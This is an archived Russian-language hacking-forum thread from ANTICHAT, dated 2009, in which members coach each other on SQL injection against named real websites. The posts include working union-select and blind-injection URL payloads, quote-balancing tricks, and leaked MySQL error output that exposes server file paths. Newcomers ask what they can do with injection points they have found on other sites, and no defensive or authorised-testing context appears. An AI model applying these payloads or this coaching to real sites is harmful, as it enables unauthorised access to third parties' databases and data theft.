ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.05.2009, 20:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от udman
по поводу
site.com/index?id=1'+and+'1'='2
будет выглядеть как
site.com/index?id=1'+and+'1'='2'
Не будет. Смотри, н.п. такой запрос есть:
PHP код:
mysql_query("SELECT column FROM table WHERE id='".$_GET['id'])."'"
Т.е. id в кавычках. Если ты напишешь 1'+and+'1'='2', запрос будет
Код:
SELECT column FROM table WHERE id='1' and '1'='2''
Синтаксис некорректный, т.к. есть лишняя кавычка. Выход - комментарии. Если же без последнего аппострофа,
Код:
SELECT column FROM table WHERE id='1' and '1'='2'
Кавычка будет закрыта.
Последний раз редактировалось mailbrush; 11.05.2009 в 20:20..
|
|
|
11.05.2009, 20:36
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
http://pocketbook.com.ua/index.php?id=204+union+select+0,user(),2,3,4,5,6,7 ,8,9,10,11,12,13,14+--+
вопрос что как здесь правильно поступить если 1 переменная в 2 или 3-х запросах
Ошибка в SQL запросе:
SELECT parent_id, page_id FROM tbl_page WHERE page_id = 204 union select 0,user(),2,3,4,5,6,7,8,9,10,11,12,13,14 --
Ответ MySQL сервера:
The used SELECT statements have a different number of columns
В файле:
/var/www/pocketbook/data/www/pocketbook.com.ua/functions.php
Строка:
160
Время: 2009-05-11 19-18-40
Ошибка в SQL запросе:
SELECT element_type, tbl_page.status, tbl_elements.element_id, tbl_attributes.value from tbl_page left join tbl_template using (template_id) left join tbl_elements using (template_id) left join tbl_attributes using (element_id) where tbl_page.page_id = 204 union select 0,user(),2,3,4,5,6,7,8,9,10,11,12,13,14 -- AND tbl_page.status=2 AND tbl_attributes.name = "field_name"
Ответ MySQL сервера:
The used SELECT statements have a different number of columns
В файле:
/var/www/pocketbook/data/www/pocketbook.com.ua/class/content_simple.class.php
Строка:
207
Время: 2009-05-11 19-18-40
1
mailbrush:
на этом сайте пробывал не получается как ты говришь, вот
http://pocketbook.com.ua/index.php?id=204'+and+'1'='2'
поправь меня если мож не так понял |
|
|
|
11.05.2009, 20:50
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
не сочтите за полного лола но все же еще спрошу
http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,2,3+--+
здесь вроде есть инк но ни табл ни user() ниче не работает, то есть 0,1,2,3 выводит и усе
|
|
|
|
11.05.2009, 20:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
1. Скуля есть, пятая ветка, если нашел ошибку с КАВЫЧКОЙ это вовсе не означает, что БЕЗ кавычки ты уже не сможешь повлиять на скуль запрос:
Код:
http://pocketbook.com.ua/index.php?id=204+and+substring(version(),1,1)=5
2. Проверяем, есть ли принтабельные поля, предварительно пытаясь подобрать их кол-во, собственно:
- принтабельных полей вроде нет, вывод - слепая скуля
3. Не устраивает слепая - ищи скули в ссылках на этом же сайте по другим параметрам
по второму сайту:
Код:
http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,unhex(hex(version())),3+--+
Только брут |
|
|
|
11.05.2009, 21:18
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
мдя, учится и еще раз учится, спасибо, кое что понял
|
|
|
|
12.05.2009, 11:42
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Можите пожалуйсто подсказать , что можно в этой SQL inj сделать?
http://darchat.org.ua/1/galery.php?mod=zh&id=1651&ps=seno&s=-2
|
|
|
|
12.05.2009, 11:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Это не инъект.
|
|
|
|
12.05.2009, 11:54
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
а вообще можно, что нибуть с ней сотворить?
|
|
|
|
12.05.2009, 12:04
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
SeNaP: я уже тебе отвечал, не флуди, там конкретно есть фильтр, а то что ты -2 ввел и еррор так это просто в базу неверный запрос пошел с - числом.
мож я не прав, поправьте )
|
|
|
|
12.05.2009, 22:36
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
http://rcc-penza.ru/content.php?action='
http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid='
ошибки sql, я новичек в этом) что нибудь дальше можно сделать с этим?)
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
